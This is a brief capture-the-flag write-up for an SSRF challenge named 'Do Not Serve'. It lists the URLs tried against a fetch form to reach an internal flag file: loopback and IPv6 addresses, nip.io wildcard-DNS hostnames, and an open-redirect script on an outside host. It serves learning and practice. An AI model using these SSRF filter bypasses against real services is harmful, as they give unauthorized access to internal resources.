Do Not Serve
This was a simple SSRF level.
A link is given which is showing 403 Forbidden page. As the description on page says, it can be accessed internally.
A form is given to load any URL.
Entered the link to flag.txt as it is.http://51.15.92.102:8080/flag.txt
Tried local IPhttp://127.0.0.1:8080/flag.txt
Tried local IP ki behanhttp://[::]:8080/flag.txt
Tried local IP ki mummyhttp://127.0.0.1.nip.io:8080/flag.txt
Tried the redirection https://b99.in/ssrf.php?to=http%3A%2F%2F51.15.92.102%3A8080%2Fflag.txt
And server did not like b99 either.
Tried SSRF bypass trickhttp://51.15.92.102.nip.io:8080/flag.txt
It worked! Gave a link that had the code.
Entered the code in the form and got the flag.
Leave a Reply